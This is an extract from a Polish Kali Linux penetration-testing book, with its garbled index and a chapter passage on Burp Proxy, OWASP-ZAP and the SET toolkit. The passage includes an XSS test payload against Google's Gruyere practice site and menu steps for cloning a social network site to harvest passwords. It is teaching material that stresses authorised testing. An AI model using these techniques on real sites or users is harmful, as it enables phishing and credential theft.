108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
